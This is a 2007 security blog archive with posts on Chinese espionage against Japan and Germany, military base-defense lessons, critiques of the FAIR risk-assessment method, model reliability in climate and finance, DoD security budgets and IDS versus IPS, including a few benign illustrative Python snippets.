Friday, August 31, 2007

Japan v China

I couldn't make this up. Thanks to SANS Newsbites for catching the article Japan Military Homes, Ship Raided Over Data Leak.

The homes of several serving members of Japan's Maritime Self Defense Force (JMSDF) and a destroyer were raided as part of an investigation into a leak of sensitive military data from a computer, Japan's Kyodo News reported Tuesday.

Officers from the Kanagawa prefectural police force and the JMSDF's own criminal investigations unit are investigating the leak of information related to the Aegis missile defense system, the sea-based Standard Missile-3 interceptor system and the reconnaissance satellite data exchange Link 16 system.

The Aegis leak first came to light in March this year when police were conducting an immigration-related investigation into the Chinese wife of a JMSDF officer. During the search they came across the data, which included the radar and transmission frequencies of the Aegis system. The officer wasn't authorized to be in possession of the data so the investigation was begun.

He apparently came into possession of the data while swapping pornography with another JMSDF officer, according to a previous report in the Yomiuri Shimbun newspaper.


Any guesses which will be the next country to reveal its fight against Chinese intelligence services?

Lessons from the Military

Jay Heiser is a smart guy, but I don't know why he became so anti-military when he wrote Military mindset no longer applicable in our line of work last year. He wrote in part:

The business world should stop looking to the defense community for direction on information security.

I used to believe that the practice of information security owed a huge debt to the military. I couldn't have been more wrong...

The business world doesn't need the defense community to help it develop secure technology, and, whenever it accepts military ideas, it winds up with the wrong agenda...

It's time our profession stops playing war games and gets in touch with its business roots.


I found two responses, Opinion: Military security legacy is one of innovation, integrity and Opinion: The importance of a military mindset, countering Mr. Heiser. I also found poll results showing 77% of respondents answered "absolutely critical" or "somewhat important" when reading the question "How important is a military mindset when planning and executing an enterprise security strategy?"

Well, it's Friday night and you know what that means in the Bejtlich household. That's right, time to watch a new episode of Dogfights. I don't have any insights based on the episode I just watched, but it reminded me of training I received my first summer at Camp USAFA.

One of the exercises we ran involved Air Base Ground Defense. We learned some basic principles and then acted first as attackers and then defenders. It occurred to me that ABGD is in some ways similar to defending digital assets, although we digital security people are not armed. This denies us the capability of truly deterring and incapacitating threats. Attribution is also easier when the enemy is physically present.

Still, I'd like to do my part showing Mr. Heiser what business can learn from the military. Much of corporate America (and Germany, and Japan) seems to be having its lunch eaten by the Chinese dragon, so it's time to take some lessons from people who do security for a living when lives are at stake.

I decided to take a look at DoD Joint Publications and found Joint Tactics, Techniques, and Procedures for Base Defense. Just skimming it I found several very interesting sections. For example, the executive summary includes this:

The general characteristics of defensive operations are:

  1. to understand the enemy;

  2. see the battlefield;

  3. use the defenders’ advantages;

  4. concentrate at critical times and places;

  5. conduct counterreconnaissance and counterattacks;

  6. coordinate critical defense assets;

  7. balance base security with political and legal constraints;

  8. and know the law of war and rules of engagement.


I think digital non-military, non-police forces can do all of these except the counterattack portion of number 5. For that we need the military and police to act, or to have them deputize us. Notice numbers 1 and 2 imply monitoring, and number 4 implies being able to recognize critical times and places via digital situational awareness.

These items are displayed in the following graphic, which expands on number 3:



The document continues:

The primary mission of the base is to support joint force objectives.

In other words, the base does not exist to provide security. The base exists to perform "business functions."

Essential actions of the defense force are to detect, warn, deny, destroy, and delay. Every intelligence and counterintelligence resource available to the base commander should be used to determine enemy capabilities and intentions. The base commander must make the best use of the terrain within the commander’s AO [area of operation].

Again, we cannot destroy the enemy, but police and military can.

This final graphic displays some physical perimeter defense measures.



This graphic nicely displays principles like defense in depth. Notice also the "intrusion detection" system (labeled "sensor") and the "network forensics" system (labeled "video camera"). Visibility is provided by lighting. If you're a Jericho Forum fan, imagine these defenses collapsed around the host or even data.

I plan to take a closer look at this document and the Air Force version, AFI 31-301, Air Base Defense.

Economist on Models

I intended to stay quiet on risk models for a while, but I read the following Economist articles and wanted to note them here for future reference.

From "Statistics and climatology: Gambling on tomorrow":

Climate models have lots of parameters that are represented by numbers... The particular range of values chosen for a parameter is an example of a Bayesian prior assumption, since it is derived from actual experience of how the climate behaves — and may thus be modified in the light of experience. But the way you pick the individual values to plug into the model can cause trouble...

Climate models have hundreds of parameters that might somehow be related in this sort of way. To be sure you are seeing valid results rather than artefacts of the models, you need to take account of all the ways that can happen.

That logistical nightmare is only now being addressed, and its practical consequences have yet to be worked out. But because of their philosophical training in the rigours of Pascal's method, the Bayesian bolt-on does not come easily to scientists. As the old saw has it, garbage in, garbage out. The difficulty comes when you do not know what garbage looks like.
(emphasis added)

This is only a subset of the argument in the article. Note that this piece includes the line "derived from actual experience of how the climate behaves." I do not see the "Bayesian prior assumption[s]" so often cited elsewhere as even being derived from experience, if you take experience to mean something grounded in recent historical evidence rather than opinion. This willingness to rely on arbitrary inputs only aggravates the problems the Economist cites.
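To illustrate the point about priors (my own toy example, not from the article): with sparse data, an arbitrary Bayesian prior dominates whatever the model reports, and only abundant evidence washes it out.

```python
# Toy Beta-Binomial sketch (illustrative only): with sparse data,
# an arbitrary prior dominates the posterior estimate.

def posterior_mean(prior_a, prior_b, successes, trials):
    """Posterior mean of a Beta(prior_a, prior_b) prior after
    observing `successes` out of `trials` Bernoulli outcomes."""
    return (prior_a + successes) / (prior_a + prior_b + trials)

# Two analysts pick different "plausible" priors for the same event.
optimist = posterior_mean(1, 9, successes=2, trials=10)   # prior says ~10%
pessimist = posterior_mean(9, 1, successes=2, trials=10)  # prior says ~90%

print(f"optimist:  {optimist:.2f}")   # 0.15
print(f"pessimist: {pessimist:.2f}")  # 0.55

# With abundant evidence, the arbitrary priors wash out:
optimist_big = posterior_mean(1, 9, successes=200, trials=1000)
pessimist_big = posterior_mean(9, 1, successes=200, trials=1000)
print(f"with 1000 trials: {optimist_big:.3f} vs {pessimist_big:.3f}")
```

The same observed outcome yields answers from 0.15 to 0.55 depending solely on which "plausible" prior the analyst preferred.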

The accompanying piece "Modelling the climate: Tomorrow and tomorrow" further explains some of the problems I've been describing previously.

While some argue about the finer philosophical points of how to improve models of the climate (see article), others just get on with it. Doug Smith and his colleagues at the Hadley Centre, in Exeter, England, are in the second camp and they seem to have stumbled on to what seems, in retrospect, a surprisingly obvious way of doing so. This is to start the model from observed reality.

Until now, when climate modellers began to run one of their models on a computer, they would “seed” it by feeding in a plausible, but invented, set of values for its parameters. Which sets of invented parameter-values to use is a matter of debate. But Dr Smith thought it might not be a bad idea to start, for a change, with sets that had really happened...

[T]he use of such real starting data made a huge improvement to the accuracy of the results. It reproduced what had happened over the courses of the decades in question as much as 50% more accurately than the results of runs based on arbitrary starting conditions.

Hindcasting, as this technique is known, is a recognised way of testing models. The proof of the pudding, though, is in the forecasting, so Dr Smith plugged in the data from two ten-day periods in 2005 (one in March and one in June), pressed the start button and crossed his fingers.
(emphasis added)

This is exactly what I've been saying. Use "observed reality" and not "plausible, but invented" opinions or "arbitrary starting conditions" and I'll be happy to see what the model produces.
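Hindcasting, in miniature, is just a hold-out test against observed reality. A toy sketch (invented data and a trivial trend "model," nothing like a real climate model) shows the mechanics:

```python
# Minimal hindcasting sketch (illustrative, not a climate model):
# fit a trivial trend "model" on early observations, then check how
# well it reproduces the later, held-out portion of the record.

def fit_trend(series):
    """Least-squares slope and intercept for y over t = 0..n-1."""
    n = len(series)
    t_mean = (n - 1) / 2
    y_mean = sum(series) / n
    num = sum((t - t_mean) * (y - y_mean) for t, y in enumerate(series))
    den = sum((t - t_mean) ** 2 for t in range(n))
    slope = num / den
    return slope, y_mean - slope * t_mean

def hindcast_error(series, split):
    """Fit on series[:split], 'hindcast' series[split:], return mean abs error."""
    slope, intercept = fit_trend(series[:split])
    preds = [intercept + slope * t for t in range(split, len(series))]
    return sum(abs(p - y) for p, y in zip(preds, series[split:])) / len(preds)

observed = [14.1, 14.3, 14.2, 14.5, 14.6, 14.8, 14.7, 15.0]  # invented demo data
print(hindcast_error(observed, split=5))
```

The error on the held-out years is the measure of the model; seeding with observed values rather than invented ones is what lets the comparison mean anything.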

Thursday, August 30, 2007

More Thoughts on FAIR

My post Thoughts on FAIR has attracted some attention, but as is often the case, some readers choose to obscure my point by overlaying their own assumptions. In this post I will try to explain my problems with FAIR as simply as possible.

Imagine if someone proposed the following model for assessing force: F=ma

(Yes, this is Newton's Second Law, and yes, I am using words like "model" and "assess" to reflect the risk assessment modeling problem.)

I could see two problems with using this model to assess force.

  1. Reality check: The model does not reflect reality. In other words, an accurate measurement of mass times an accurate measurement of acceleration does not result in an accurate measurement of force.

  2. Input check: To accurately measure force, the values for m and a must not be arbitrary. Otherwise, the value for F is arbitrary.


With respect to FAIR, I make the following judgments.

  1. Reality check: The jury is out on whether FAIR reflects reality. It certainly might. It might not.

  2. Input check: I have not seen any evidence that FAIR expects or requires anything other than arbitrary inputs. Arbitrary inputs to a model that passes the reality check do not produce anything valuable as far as I am concerned.

    If you personally like feeding your own opinions into a model to see what comes out the other end, have at it. It's nice to play around by making assumptions, seeing the result, and then altering the inputs to suit whatever output you really wanted to see.


One of the previous post commenters mentioned the book Uncertainty, which looks fascinating. If you read the excerpt you'll notice this line:

In the early 1970s what was then the U.S. Atomic Energy Commission (AEC) asked Norman C. Rasmussen, a professor of nuclear engineering at the Massachusetts Institute of Technology, to undertake a quantitative study of the safety of light-water reactors...

Rasmussen assembled a team of roughly sixty people, who undertook to identify and formally describe, in terms of event trees, the various scenarios they believed might lead to major accidents in each of the two reactors studied. Fault trees were developed to estimate the probabilities of the various events.

A combination of historical evidence from the nuclear and other industries, together with expert judgment, were used to construct the probability estimates, most of which were taken to be log-normally distributed.
(emphasis added)

I've seen no commitment to including real evidence in FAIR, and I submit that those who lack evidence will have their so-called "expert judgment" fail due to soccer-goal security. Therefore, they possess neither historical evidence nor truly expert judgment. So, even if FAIR meets my reality check, the results are only a feel-good exercise.

So how can I defend the use of this model?

Risk = Vulnerability X Threat X Impact (or Cost)

As I've said before, it is useful for showing the effects on Risk if you change one of the factors, ceteris paribus. This assumes that the model passes the reality check, which I believe it does.

I am not trying to calculate absolute values for Risk when I cite this equation. I am trying to conceptually show how Risk decreases when Threat decreases (ceteris paribus), or how Risk increases as Vulnerability increases (ceteris paribus), and so on.

You could take the same approach with F=ma if you were trying to explain to someone how it would hurt more to be struck by an object whose mass is larger than another object, assuming constant acceleration for each event. I am not trying to calculate F in such a case; I'm only using the model to describe the relationship between the components.
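A few lines of code make the ceteris paribus usage concrete (my own illustration with invented ordinal inputs; only the direction of the comparison is meaningful):

```python
# Risk = Vulnerability x Threat x Impact used only for relative,
# ceteris-paribus comparisons -- the absolute numbers mean nothing.

def risk(vulnerability, threat, impact):
    return vulnerability * threat * impact

baseline = risk(vulnerability=3, threat=2, impact=4)        # arbitrary ordinal inputs
reduced_threat = risk(vulnerability=3, threat=1, impact=4)  # same, but less threat

# The model supports only a directional claim:
assert reduced_threat < baseline  # less threat -> less risk, all else equal

# Same idea with F = m*a: a heavier object at the same acceleration
# exerts more force, even if we never trust an absolute value of F.
def force(mass, acceleration):
    return mass * acceleration

assert force(mass=10, acceleration=2) > force(mass=5, acceleration=2)
```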

Tuesday, August 28, 2007

DoD Digital Security Spending


I found the article Is IT security getting short shrift? to be a good reference for other large organizations contemplating digital security spending. In addition to the chart above, this text is illuminating:

Despite the growing number of attacks on military networks, securing enough money for information assurance programs is still a hard sell at the Defense Department, former Pentagon officials say.

“It’s been the source of enormous frustration,” Linton Wells said in a recent interview in which he recounted some of the difficulties he faced during his four-year tenure as principal deputy assistant secretary of Defense for networks and information integration...

[C]onvincing senior budget officials from the military services to spend money in that area is a continuing challenge, Wells said.

“What they say is, ‘Look, we’re all short on money for things we want to buy — ships, planes, tanks, whatever. Show me how this $2 million you want to put on this today is going to turn cell C17 from red to yellow to green in 2011,’” Wells said. “And that’s often a hard thing to do in information assurance.”

Wells said officials in charge of putting together the information technology security budget for DOD’s networks need better metrics for measuring return on investment for information assurance programs.

“We have not done a good job of making the case that a dollar spent here is going to lead to a quantifiable increase there,” he said.
(emphasis added)

I saw Dr. Wells speak at Black Hat Federal 2006.

I have three brief points.

First, I think the bold text is the problem. If I'm being asked to spend money to turn a spreadsheet cell different colors, of course I'm going to debate the value of that spending. The problem is that the metrics used in these situations largely don't matter.

Second, I would be interested in knowing how much of the DoD budget funds counter-intelligence activities. The majority of the serious problems DoD faces have a counter-intelligence function. The intent of the adversary's activities is no different now than it was in pre-Internet days. How much has historically been spent on stopping spies?

Third, it is sad to continue to see security treated as a separate function that has to justify its own existence in financial terms. Security does not make any money so it cannot possibly compete against business projects which do. This is not strictly the case in DoD because none of the military makes money, but it is certainly true of civilian industries.

Germany v China

Thanks to the Dark Reading story China's Premier 'Gravely Concerned' by Hack on Germany, I learned of recent digital economic espionage conducted by China against Germany. I found the most authoritative reference on the event to be published by the magazine that broke the story, which is currently running an article titled Merkel's China Visit Marred by Hacking Allegations:

German Chancellor Angela Merkel was all smiles after meeting Chinese Premier Wen Jiabao on Monday, praising relations between the two countries as open and constructive.

But her visit has been marred by a report in SPIEGEL that a large number of computers in the German chancellery as well as the foreign, economy and research ministries had been infected with Chinese spy software. Germany's domestic intelligence service, the Office for the Protection of the Constitution, discovered the hacking operation in May, the magazine reported in its new edition, published Monday...

The so-called "Trojan" espionage programs were concealed in Microsoft Word documents and PowerPoint files which infected IT installations when opened, SPIEGEL reported. Information was taken from German computers in this way on a daily basis by hackers based in the north-western province of Lanzhou, Canton province and Beijing. German officials believe the hackers were being directed by the People's Liberation Army and that the programs were redirected via computers in South Korea to disguise their origin.

German security officials managed to stop the theft of 160 gigabytes of data which were in the process of being siphoned off German government computers. "But no one knows how much has leaked out," a top official told SPIEGEL.

The hacking operation has triggered fears in Germany that China may also have infiltrated the computer systems of leading German companies, to steal technology secrets and thereby speed up its inexorable economic growth. The domestic intelligence service plans to help businesses hunt for spy programs in their computers.


China's Foreign Ministry spokesperson had this official comment:

Q: German media reported that German government computers were attacked by Chinese hackers. What's your comment?

A: The Chinese Government has always opposed to and forbidden any criminal acts undermining computer systems including hacking. We have explicit laws and regulations in this regard.

Hacking is an international issue and China is also a frequent victim. China has established a sound mechanism of cooperation with many countries in jointly countering internet crimes. China is willing to cooperate with Germany in this regard.


I find it interesting that the Germans are willing to directly confront this problem in public.

Sunday, August 26, 2007

Thoughts on FAIR

You knew I had risk on my mind given my recent post Economist on the Peril of Models. The fact is I just flew to Chicago to teach my last Network Security Operations class, so I took some time to read the Risk Management Insight white paper An Introduction to Factor Analysis of Information Risk (FAIR). I needed to respond to Risk Assessment Is Not Guesswork, so I figured reading the whole FAIR document was a good start. I said in Brothers in Risk that I liked RMI's attempts to bring standardized terms to the profession, so I hope they approach this post with an open mind.

I have some macro issues with FAIR as well as some micro issues. Let me start with the macro issue by asking you a question:

Does breaking down a large problem into small problems, the solutions to which rely upon making guesses, result in solving the large problem more accurately?

If you answer yes, you will like FAIR. If you answer no, you will not like FAIR.

FAIR defines risk as

Risk - the probable frequency and probable magnitude of future loss

That reminded me of

Annual Loss Expectancy (ALE) = Annualized Rate of Occurrence (ARO) X Single Loss Expectancy (SLE)

If you don't agree, remove the "annual" terms from the second definition, or add them to the FAIR definition.

I have always preferred this equation

Risk = Vulnerability X Threat X Impact (or Cost)

because it is useful for showing the effects on risk if you change one of the factors, ceteris paribus. (Ok, I threw the Latin in there as homage to one of my economics instructors.)

If you consider frequency when estimating threat activity and include countermeasures as a component of vulnerability, you'll notice that Threat X Vulnerability starts looking like ARO. Impact (or Cost) is practically the same as SLE, so the two equations are similar.
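The structural similarity can be made explicit with a sketch (my own invented numbers; the point is the mapping between terms, not the values):

```python
# ALE = ARO x SLE versus Risk = Threat x Vulnerability x Impact.
# If Threat carries the frequency and Vulnerability folds in
# countermeasures, then Threat x Vulnerability plays the role of
# ARO, and Impact plays the role of SLE.

def ale(aro, sle):
    return aro * sle

def risk(threat, vulnerability, impact):
    return threat * vulnerability * impact

# Invented example: 4 attempts/year, 25% succeed, $100,000 per loss.
threat_frequency = 4.0   # attempts per year
vulnerability = 0.25     # probability an attempt succeeds
impact = 100_000         # single loss expectancy in dollars

aro = threat_frequency * vulnerability  # 1 expected loss event per year
print(ale(aro, impact))                               # 100000.0
print(risk(threat_frequency, vulnerability, impact))  # 100000.0
```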

FAIR turns its definition into the following.



If you care to click on that diagram, you'll see many small elements that need to be estimated. Specifically, you can follow the Basic Risk Assessment Guide to see these are the steps.

  • Stage 1. Identify scenario components


    • 1. Identify the asset at risk

    • 2. Identify the threat community under consideration


  • Stage 2. Evaluate Loss Event Frequency (LEF)


    • 3. Estimate the probable Threat Event Frequency (TEF)

    • 4. Estimate the Threat Capability (TCap)

    • 5. Estimate Control strength (CS)

    • 6. Derive Vulnerability (Vuln)

    • 7. Derive Loss Event Frequency (LEF)


  • Stage 3. Evaluate Probable Loss Magnitude (PLM)


    • 8. Estimate worst-case loss

    • 9. Estimate probable loss


  • Stage 4. Derive and articulate Risk


    • 10. Derive and articulate Risk



The problem with FAIR is that in every place you see the word "Estimate" you can substitute "Make a guess that's not backed by any objective measurement and which could be challenged by anyone with a different agenda." Because all the derived values are based on those estimates, your assessment of FAIR depends on the answer to the question I asked at the start of this post.
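To see how those estimates propagate, here is a minimal sketch of a FAIR-style derivation chain. The lookup tables are my own invented simplifications, not FAIR's actual charts; the point is that every derived value inherits the initial guesses:

```python
# Simplified sketch of a FAIR-style derivation: qualitative estimates
# feed lookup tables, so every derived value inherits the guesses.
# The tables below are invented simplifications, not FAIR's charts.

LEVELS = ["VL", "L", "M", "H", "VH"]  # Very Low .. Very High

def derive_vuln(tcap, cs):
    """Vulnerability rises as threat capability exceeds control strength."""
    gap = LEVELS.index(tcap) - LEVELS.index(cs)
    return "VL" if gap <= -2 else "L" if gap == -1 else "M" if gap == 0 \
        else "H" if gap == 1 else "VH"

def derive_lef(tef, vuln):
    """Loss event frequency is capped by how often attempts occur."""
    return LEVELS[min(LEVELS.index(tef), LEVELS.index(vuln))]

def derive_risk(lef, plm):
    """Risk rating from loss event frequency and probable loss magnitude."""
    score = LEVELS.index(lef) + LEVELS.index(plm)
    return "Low" if score <= 2 else "Medium" if score <= 5 else "High"

# The estimates from the sticky-note scenario (guesses #1 through #5):
tef, tcap, cs, plm = "L", "M", "VL", "M"   # worst-case loss omitted for brevity
vuln = derive_vuln(tcap, cs)               # "VH": Medium TCap vs Very Low CS
lef = derive_lef(tef, vuln)                # "L": capped by the Low TEF guess
print(derive_risk(lef, plm))               # Medium

# Change one guess and the rating shifts -- arbitrary in, arbitrary out:
print(derive_risk(derive_lef("VL", vuln), plm))  # Low
```

Nothing in the chain challenges the five inputs; the machinery only transforms them.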

Let's see how this process stands up to some simple scrutiny by reviewing FAIR's Analyzing a Simple Scenario.

A Human Resources (HR) executive within a large bank has his username and password written on a sticky-note stuck to his computer monitor. These authentication credentials allow him to log onto the network and access the HR applications he’s entitled to use...

1. Identify the Asset at Risk: In this case, however, we’ll focus on the credentials, recognizing that their value is inherited from the assets they’re intended to protect.


We start with a physical security risk case. This simplifies the process considerably and actually gives FAIR the best chance it has to reflect reality. Why is that? The answer is that the physical world changes more slowly than the digital world. We don't have to worry about solid walls being penetrated by a mutant from the X-Men movies, or about the state of the credentials suddenly changing due to a patch or configuration change.

Identify the Threat Community: If we examine the nature of the organization (e.g., the industry it’s in, etc.), and the conditions surrounding the asset (e.g., an HR executive’s office), we can begin to parse the overall threat population into communities that might reasonably apply... For this example, let’s focus on the cleaning crew.

That's convenient. The document lists six potential threat communities but decides to only analyze one. Simplification sure makes it easier to proceed with this analysis. It also means the result is so narrowly targeted as to be almost worthless, unless we decide to repeat this process for the rest of the threat communities. And this is still only looking at a sticky note.

3. Estimate the probable Threat Event Frequency (TEF): Many people demand reams of hard data before they’re comfortable estimating attack frequency. Unfortunately, because we don’t have much (if any) really useful or credible data for many scenarios, TEF is often ignored altogether. So, in the absence of hard data, what’s left? One answer is to use a qualitative scale, such as Low, Medium, or High.

And, while there’s nothing inherently wrong with a qualitative approach in many circumstances, a quantitative approach provides better clarity and is more useful to most decision-makers – even if it’s imprecise.

For example, I may not have years of empirical data documenting how frequently cleaning crew employees abuse usernames and passwords on sticky-notes, but I can make a reasonable estimate within a set of ranges.

Recognizing that cleaning crews are generally comprised of honest people, that an HR executive’s credentials typically would not be viewed or recognized as especially valuable to them, and that the perceived risk associated with illicit use might be high, then it seems reasonable to estimate a Low TEF using the table below...

Is it possible for a cleaning crew to have an employee with motive, sufficient computing experience to recognize the potential value of these credentials, and with a high enough risk tolerance to try their hand at illicit use? Absolutely! Does it happen? Undoubtedly. Might such a person be on the crew that cleans this office? Sure – it’s possible. Nonetheless, the probable frequency is relatively low.
(emphasis added)

Says who? Has the person making this assessment done any research to determine if infiltrating cleaning crews is a technique used by economic adversaries? If yes, how often does that happen? What is the nature of the crew cleaning this office? Do they perform background checks? Have they been infiltrated before? Are they owned by a competitor? Figuring all of that out is too hard. Let's just supply guess #1: "low."

4. Estimate the Threat Capability (Tcap): Tcap refers to the threat agent’s skill (knowledge & experience) and resources (time & materials) that can be brought to bear against the asset... In this case, all we’re talking about is estimating the skill (in this case, reading ability) and resources (time) the average member of this threat community can use against a password written on a sticky note. It’s reasonable to rate the cleaning crew Tcap as Medium, as compared to the overall threat population.

Why is that? Why not "low" again? These are janitors we're discussing. Guess #2.

5. Estimate the Control Strength (CS): Control strength has to do with an asset’s ability to resist compromise. In our scenario, because the credentials are in plain sight and in plain text, the CS is Very Low. If they were written down, but encrypted, the CS would be different – probably much higher.

It is easy to accept guess #3 because we are dealing with a physical security scenario. It's simple for any person to understand that a sticky note in plain sight has zero controls applied against it, so the (nonexistent) "controls" are worthless. But what about that new Web application firewall? Or your anti-virus software? Or any other technical control? Good luck assessing their effectiveness in the face of attacks that evolve on a weekly basis.

6. Derive Vulnerability (Vuln)

This value is derived using a chart that balances Tcap vs Control Strength. Since it is based on two guesses, one could debate whether it is more or less accurate than estimating the vulnerability directly.

7. Derive Loss Event Frequency (LEF)

This value is derived using a chart that balances TEF vs Vulnerability. We derived vulnerability in the previous step and estimated TEF in step 3.

8. Estimate worst-case loss: Within this scenario, three potential threat actions stand out as having significant loss potential – misuse, disclosure, and destruction... For this exercise, we’ll select disclosure as our worst-case threat action.

This step considers Productivity, Response, Replacement, Fines/Judgments, Competitive Advantage, and Reputation, with Threat Actions including Access, Modification, Disclosure, and Denial of Access. Enter guess #4.

9. Estimate probable loss magnitude (PLM): The first step in estimating PLM is to determine which threat action is most likely. Remember; actions are driven by motive, and the most common motive for illicit action is financial gain. Given this threat community, the type of asset (personal information), and the available threat actions, it’s reasonable to select Misuse as the most likely action – e.g., for identity theft. Our next step is to estimate the most likely loss magnitude resulting from Misuse for each loss form.

Again, says who? Was identity theft chosen because it's popular in the news? My choice for guess #5 could be something completely different.

10. Derive and Articulate Risk: [R]isk is simply derived from LEF and PLM. The question is whether to articulate risk qualitatively using a matrix like the one below, or articulate risk as LEF, PLM, and worst-case.

The final risk rating is another derived value, based on previous estimates.

The FAIR author tries to head off critiques like this blog with the following section:

It’s natural, though, for people to accept change at different speeds. Some of us hold our beliefs very firmly, and it can be difficult and uncomfortable to adopt a new approach. Ultimately, not everyone is going to agree with the principles or methods that underlie FAIR. A few have called it nonsense. Others appear to feel threatened by it.

Apparently I'm resistant to "change" and "threatened" because I firmly hold on to "beliefs." I'm afraid that is what I will have to do when frameworks like this are founded upon someone's opinion at each stage of the decision-making process.

The FAIR document continues:

Their concerns tend to revolve around one or more of the following issues:

The absence of hard data. There’s no question that an abundance of good data would be useful. Unfortunately, that’s not our current reality. Consequently, we need to find another way to approach the problem, and FAIR is one solution.


I think I just read that the author admits FAIR is not based on "good data," and since we don't have data, we should just "find another way," like FAIR.

The lack of precision. Here again, precision is nice when it’s achievable, but it’s not realistic within this problem space. Reality is just too complex... FAIR represents an attempt to gain far better accuracy, while recognizing that the fundamental nature of the problem doesn’t allow for a high degree of precision.

The author admits that FAIR is not precise. How can it even be accurate when the derived values are all based on subjective estimates anyway?

Some people just don’t like change – particularly change as profound as this represents.

I fail to see why FAIR is considered profound. Is the answer because the process has been broken into five estimates, from which several other values are derived? Why is this any better than articles like How to Conduct a Risk Analysis or Risk Analysis Tools: A Primer or Risk Assessment and Threat Identification?

I'm sure this isn't the last word on this issue, but I need to rest before teaching tomorrow. Thank you for staying with me if you read the whole post. Obviously if I'm not a fan of FAIR I should propose an alternative. In Risk-Based Security is the Emperor's New Clothes I cited Donn Parker, who is probably the devil to FAIR advocates. If the question is how to make security decisions by assessing digital risk, I will put together thoughts on that for a post (hopefully this week).

Incidentally, the fact that I am not a fan of FAIR doesn't mean I think the authors have wasted their time. I appreciate their attempt to bring rigor to this process. I also think the questions they ask and the elements they consider are important. However, I think the ability to insert whatever value one likes into the five estimations fatally wounds the process.

This is the bottom line for me: FAIR advocates claim their output is superior due to their framework. How can a framework that relies on arbitrary inputs produce non-arbitrary output? And what makes FAIR so valuable anyway -- has the result been tested against any other methods?

Economist on the Peril of Models

Anyone who has been watching financial television stations in the US has seen commentary on the state of our markets with respect to subprime mortgages. I'd like to cite the 21 July 2007 issue of the Economist to make a point that resonates with digital security.

Both [Bear Stearns] funds had invested heavily in securities backed by subprime mortgages... On July 17th it admitted that there “is effectively no value left” in one of the funds, and “very little value left” in the other.

Such brutal clarity is, however, a rarity in the world of complex derivatives. Investors may now know what the two Bear Stearns funds are worth. But accountants are still unsure how to put a value on the instruments that got them into trouble.


This reminds me of a data breach -- instant clarity.

Traditionally, a company's accounts would record the value of an asset at its historic cost (ie, the price the company paid for it). Under so-called “fair value” accounting, however, book-keepers can now record the value of an asset at its market price (ie, the price the company could get for it).

But many complex derivatives, such as mortgage-backed securities, do not trade smoothly and frequently in arm's length markets. This makes it impossible for book-keepers to “mark” them to market. Instead they resort to “mark-to-model” accounting, entering values based on the output of a computer.


Note the reference to "complex"[ity] and book-keepers basing their decisions on models created by other people who make assumptions. Is this starting to sound like risk analysis to you, too?

Unfortunately, the market does not always resemble the model... Models are supposed to show the price an asset would fetch in a sale. But in an illiquid market, a big sale can itself drive down prices. This can sometimes create a sizeable difference between “mark-to-model” valuations and true market prices.

That is not the only problem with fair-value accounting. According to Richard Herring, a finance professor at the Wharton School, “models are easy to manipulate”...

Unfortunately, the alternatives to fair-value accounting can be worse. Historic cost may be harder to manipulate than the results of a model. But as Bob Herz, chairman of America's Financial Accounting Standards Board, points out, it too is “replete with all sorts of guesses”, such as depreciation rates...


"Models are easy to manipulate" and alternatives are also "replete with all sorts of guesses." This sounds exactly like risk analysis now.

Fair value is perhaps most worrying for auditors, who are often blamed for faulty accounts. Faced with murky models, the best they can do is examine assumptions and ensure disclosure.

This means that the role of the auditor becomes that of an outside expert who makes a new set of subjective decisions, perhaps challenging the assumptions of those who made subjective decisions when creating their model. The auditor's advantage, however, is that he/she has insight into the workings of many similar companies, and could compare "best practices" against the specific company being audited.
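A toy mark-to-model sketch (entirely hypothetical numbers and parameter names, not any real pricing model) shows how a single modeler's assumption drives the supposedly objective output:

```python
def mark_to_model(face_value, assumed_default_rate, recovery_rate=0.4):
    # Toy valuation of a debt instrument: expected payoff given an
    # assumed default rate and an assumed recovery on default. The
    # "market price" is whatever the modeler's assumptions say it is.
    survival = 1.0 - assumed_default_rate
    return face_value * (survival + assumed_default_rate * recovery_rate)

benign = mark_to_model(1_000_000, assumed_default_rate=0.02)    # ~988,000
stressed = mark_to_model(1_000_000, assumed_default_rate=0.20)  # ~880,000
```

One input, moved from 2% to 20%, swings the book value by more than a hundred thousand dollars; the auditor's job reduces to challenging that one assumption.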

Incidentally, I would love to know how the "CISO of a major Wall Street bank" who criticized Dan Geer as mentioned in Are the Questions Sound? feels now about his precious financial models. Somehow I doubt his bonus will be as big as it was last year, if his company is even solvent by year's end.

Thursday, August 23, 2007

Experts: IDS is here to stay

Imagine my surprise when I read Experts: IDS is here to stay:

Conventional wisdom once had it that intrusion prevention systems (IPS) would eliminate the need for intrusion defense systems (IDS). But with threats getting worse by the day and IT pros needing every weapon they can find, the IDS is alive and well.

"IPS threatened to hurt the IDS market but IDS is better equipped to inspect malware," said Chris Liebert, a security analyst with Boston-based Yankee Group Research Inc. "IPS specializes in blocking, so each still have their own uses, and that's why IDS is still around."

IDS is now part of a larger intrusion defense arsenal that includes vulnerability management and access control technology. In fact, one analyst believes standalone IDS products will still be in demand five years from now while IPS technology will likely be folded in firewall products.

"In the long term, I do not think IPS devices will remain as separate products," said Eric Maiwald, a senior security analyst for Midvale, Utah-based Burton Group. "We see this happening already. All of the major firewall vendors offer some amount of IPS functionality in their products. At the same time, there is much firewall-like capability in the IPS products."

IDS products will probably remain as separate devices because of the need to monitor happenings on a network and monitor actions of other policy enforcement points, he said.
(emphasis added)

Wow, imagine that. Anyone who's read my books or this blog for any amount of time knows I've advocated this position for years. What's an "IPS" anyway? It's a filtering device, aka "firewall." What's an "IDS"? It's an attack or incident indication system. The two functions are completely different and should be separate. It's too late for me to say any more now, but I wanted to note this article before I forget I read it.

Tuesday, August 21, 2007

What Hackers Learn that the Rest of Us Don't

I read a great article in the July/August 2007 IEEE Security and Privacy magazine titled "What Hackers Learn that the Rest of Us Don't" by Sergey Bratus. He contrasts developers and academic programs with what "hackers" do. For example:

  • Developers are under pressure to follow standard solutions, or the path of least resistance to "just making it work."

  • Developers tend to be implicitly trained away from exploring underlying APIs because the extra time investment rarely pays off.

  • Developers often receive a limited view of the API, with few or hardly any details about its implementation.

  • Developers are de facto trained to ignore or avoid infrequent border cases and might not understand their effects.

  • Developers might receive explicit directions to ignore specific problems as being in other developers' domains.

  • Developers often lack tools for examining the full state of the system, let alone changing it outside of the limited API.


This statement really resonated with me:

In a typical academic setting... an ever-increasing number of topics limits the time the students and teachers can allocate for any specific one.

My comment: in contrast, attackers obsess over minute, specific aspects of a target, which ultimately allows them to beat defenders.

Let's contrast developers with "hackers."

  • Hackers tend to treat special and border cases of standards as essential and invest significant time in reading the appropriate documentation.

  • Hackers insist on understanding the underlying API's implementation and exploring it to confirm the documentation's claims.

  • Hackers second-guess the implementer's logic.

  • Hackers reflect on and explore the effects of deviating from standard tutorials.

